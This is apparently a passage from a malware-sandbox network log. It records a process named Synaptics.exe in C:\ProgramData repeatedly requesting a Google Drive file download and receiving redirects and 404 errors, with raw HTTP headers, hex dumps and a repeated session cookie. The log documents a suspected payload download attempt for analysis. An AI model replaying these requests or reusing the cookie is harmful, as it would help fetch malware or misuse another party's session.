                                                                                                                2024-12-30 09:58:30 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                75192.168.2.759923142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:31 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC4gvqIdAY5qXbnm3yY6QFo_usM9aZdJVyCzZHgC0mUvH1l8Ba6mToMWsrOJ8xiicUvk0b5nXbQ
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:31 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jl884KnxyVBC5Azazuj8IA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:31 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:31 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 4e 58 68 55 78 43 33 67 73 51 57 6e 75 49 44 43 68 77 46 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="wNXhUxC3gsQWnuIDChwF4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:31 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                76192.168.2.759924216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:31 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Jpc_lvlRMo7I_JrtWxtWhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                77192.168.2.759922216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:31 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-a6rQnn2Y62CYTEIai1Eojg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                78192.168.2.759925142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:31 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC45Qb11Lwljhb8x2ZM9OZhtyf_Ooo5vtuaum_Ai-ydoPt8hfG8_wa2pyH6rpEws7aHP
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:31 GMT
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-XhW0vGcxCfp9wO0lv8i5uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:31 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:31 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 30 52 62 72 56 51 45 38 4c 32 74 53 6d 39 6c 75 71 78 6e 58 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="P0RbrVQE8L2tSm9luqxnXQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:31 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                79192.168.2.759934216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:32 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-3WqLIA03PK7FEutCyWVvQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                80192.168.2.759937142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:32 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:32 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6v0aWumbYDI7cKsNkYfKAbN5h37_jaMKOjWdXEWLyZqCE8qwjSo1vRwEohIeOUIfHLceFn2LI
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:32 GMT
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-15_EIfn6xll7z5W-1tyo5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:32 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:32 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 4d 44 5f 78 35 4f 56 4b 65 34 50 45 30 2d 76 4a 44 31 37 58 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="BMD_x5OVKe4PE0-vJD17XA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:32 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                81192.168.2.759933216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:32 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Lryqvmx_xBM5eJK9ktUh-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                82192.168.2.759941142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:32 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
